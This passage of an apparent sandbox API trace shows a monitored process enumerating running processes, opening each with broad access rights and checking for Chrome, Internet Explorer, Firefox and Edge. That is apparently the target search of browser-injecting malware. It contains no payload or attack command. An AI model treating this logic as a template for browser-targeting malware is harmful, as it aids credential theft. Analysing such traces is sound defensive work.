	[0198.846] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1
	[0198.846] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x178) returned 0x1760
	[0198.847] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.847] StrStrIA (lpFirst="wininit.exe", lpSrch="chrome.exe") returned 0x0
	[0198.847] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.847] StrStrIA (lpFirst="wininit.exe", lpSrch="iexplore.exe") returned 0x0
	[0198.847] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.847] StrStrIA (lpFirst="wininit.exe", lpSrch="firefox.exe") returned 0x0
	[0198.848] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.848] StrStrIA (lpFirst="wininit.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0198.848] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0198.849] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x184) returned 0x1764
	[0198.849] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.849] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0198.849] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.849] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0198.849] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.849] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0198.850] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.850] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0198.850] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1
	[0198.850] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1ac) returned 0x1768
	[0198.851] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.851] StrStrIA (lpFirst="winlogon.exe", lpSrch="chrome.exe") returned 0x0
	[0198.851] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.851] StrStrIA (lpFirst="winlogon.exe", lpSrch="iexplore.exe") returned 0x0
	[0198.851] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.851] StrStrIA (lpFirst="winlogon.exe", lpSrch="firefox.exe") returned 0x0
	[0198.852] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.852] StrStrIA (lpFirst="winlogon.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0198.852] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1
	[0198.853] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1d8) returned 0x176c
	[0198.853] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.853] StrStrIA (lpFirst="services.exe", lpSrch="chrome.exe") returned 0x0
	[0198.853] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.853] StrStrIA (lpFirst="services.exe", lpSrch="iexplore.exe") returned 0x0
	[0198.853] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.854] StrStrIA (lpFirst="services.exe", lpSrch="firefox.exe") returned 0x0
	[0198.854] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.854] StrStrIA (lpFirst="services.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0198.854] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1
	[0198.855] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e0) returned 0x1770
	[0198.855] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.855] StrStrIA (lpFirst="lsass.exe", lpSrch="chrome.exe") returned 0x0
	[0198.855] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.855] StrStrIA (lpFirst="lsass.exe", lpSrch="iexplore.exe") returned 0x0
	[0198.856] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.856] StrStrIA (lpFirst="lsass.exe", lpSrch="firefox.exe") returned 0x0
	[0198.856] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.856] StrStrIA (lpFirst="lsass.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0198.856] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1
	[0198.857] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e8) returned 0x1774
	[0198.857] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.857] StrStrIA (lpFirst="lsm.exe", lpSrch="chrome.exe") returned 0x0
	[0198.857] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.857] StrStrIA (lpFirst="lsm.exe", lpSrch="iexplore.exe") returned 0x0
	[0198.857] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.858] StrStrIA (lpFirst="lsm.exe", lpSrch="firefox.exe") returned 0x0
	[0198.858] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.858] StrStrIA (lpFirst="lsm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0198.858] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0198.859] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x250) returned 0x1778
	[0198.859] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.859] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0198.859] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.859] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0198.859] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.860] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0198.860] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.860] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0198.860] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0198.861] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x290) returned 0x177c
	[0198.861] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.861] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0198.861] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.861] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0198.862] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.862] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0198.862] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.862] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0198.862] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0198.863] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x2c4) returned 0x1780
	[0198.863] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.863] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0198.863] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.863] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0198.864] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.864] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0198.864] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.864] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0198.864] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x324, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0198.865] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x324) returned 0x1784
	[0198.865] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.865] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0198.865] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.865] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0198.866] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.866] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0198.866] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.866] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0198.866] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x34c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0198.867] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x34c) returned 0x1788
	[0198.867] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.867] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0198.867] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.867] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0198.867] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.867] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0198.868] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.868] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0198.868] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0198.869] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x3e4) returned 0x178c
	[0198.869] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.869] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0198.869] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.869] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0198.870] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.870] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0198.870] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.870] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0198.870] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x42c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0198.871] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x42c) returned 0x1790
	[0198.871] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.871] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0198.871] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.871] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0198.871] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.872] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0198.872] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.872] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0198.872] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1
	[0198.873] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4c8) returned 0x1794
	[0198.873] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.873] StrStrIA (lpFirst="spoolsv.exe", lpSrch="chrome.exe") returned 0x0
	[0198.873] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.873] StrStrIA (lpFirst="spoolsv.exe", lpSrch="iexplore.exe") returned 0x0
	[0198.873] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.873] StrStrIA (lpFirst="spoolsv.exe", lpSrch="firefox.exe") returned 0x0
	[0198.874] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.874] StrStrIA (lpFirst="spoolsv.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0198.874] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0198.875] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4f0) returned 0x1798
	[0198.875] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.875] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0198.875] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.875] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0198.875] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.875] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0198.876] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.876] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0198.876] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0198.876] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x54c) returned 0x179c
	[0198.877] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.877] StrStrIA (lpFirst="taskhost.exe", lpSrch="chrome.exe") returned 0x0
	[0198.877] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.877] StrStrIA (lpFirst="taskhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0198.877] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.877] StrStrIA (lpFirst="taskhost.exe", lpSrch="firefox.exe") returned 0x0
	[0198.878] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.878] StrStrIA (lpFirst="taskhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0198.878] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x34c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0198.879] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x590) returned 0x17a0
	[0198.879] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.879] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0198.879] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.879] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0198.879] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.879] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0198.880] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.880] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0198.880] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0198.881] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xf0) returned 0x17a4
	[0198.881] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.881] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0198.881] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.881] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0198.881] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.881] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0198.882] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.882] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0198.882] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x270, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0198.883] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x270) returned 0x17a8
	[0198.883] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.883] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="chrome.exe") returned 0x0
	[0198.883] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.883] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="iexplore.exe") returned 0x0
	[0198.883] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.883] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="firefox.exe") returned 0x0
	[0198.884] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.884] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0198.884] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x500, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1
	[0198.885] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x500) returned 0x17ac
	[0198.885] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.885] StrStrIA (lpFirst="sppsvc.exe", lpSrch="chrome.exe") returned 0x0
	[0198.935] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.935] StrStrIA (lpFirst="sppsvc.exe", lpSrch="iexplore.exe") returned 0x0
	[0198.935] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.935] StrStrIA (lpFirst="sppsvc.exe", lpSrch="firefox.exe") returned 0x0
	[0198.935] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.936] StrStrIA (lpFirst="sppsvc.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0198.936] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x324, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1
	[0198.936] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x7b8) returned 0x17b0
	[0198.936] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.937] StrStrIA (lpFirst="dwm.exe", lpSrch="chrome.exe") returned 0x0
	[0198.937] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.937] StrStrIA (lpFirst="dwm.exe", lpSrch="iexplore.exe") returned 0x0
	[0198.937] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.937] StrStrIA (lpFirst="dwm.exe", lpSrch="firefox.exe") returned 0x0
	[0198.937] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.937] StrStrIA (lpFirst="dwm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0198.937] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x394, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1
	[0198.938] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x61c) returned 0x17b4
	[0198.938] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.938] StrStrIA (lpFirst="explorer.exe", lpSrch="chrome.exe") returned 0x0
	[0198.939] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.939] StrStrIA (lpFirst="explorer.exe", lpSrch="iexplore.exe") returned 0x0
	[0198.939] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.939] StrStrIA (lpFirst="explorer.exe", lpSrch="firefox.exe") returned 0x0
	[0198.939] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.939] StrStrIA (lpFirst="explorer.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0198.939] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1
	[0198.940] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x62c) returned 0x0
	[0198.940] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="shirts_cumshots_compaq.exe")) returned 1
	[0198.941] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa78) returned 0x17b8
	[0198.941] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.941] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="chrome.exe") returned 0x0
	[0198.941] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.941] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="iexplore.exe") returned 0x0
	[0198.942] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.942] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="firefox.exe") returned 0x0
	[0198.943] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.943] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0198.943] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="league.exe")) returned 1
	[0198.944] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa9c) returned 0x17bc
	[0198.944] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.944] StrStrIA (lpFirst="league.exe", lpSrch="chrome.exe") returned 0x0
	[0198.944] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.944] StrStrIA (lpFirst="league.exe", lpSrch="iexplore.exe") returned 0x0
	[0198.944] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.944] StrStrIA (lpFirst="league.exe", lpSrch="firefox.exe") returned 0x0
	[0198.945] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.945] StrStrIA (lpFirst="league.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0198.945] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="js_sound.exe")) returned 1
	[0198.946] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaac) returned 0x17c0
	[0198.946] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.946] StrStrIA (lpFirst="js_sound.exe", lpSrch="chrome.exe") returned 0x0
	[0198.946] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
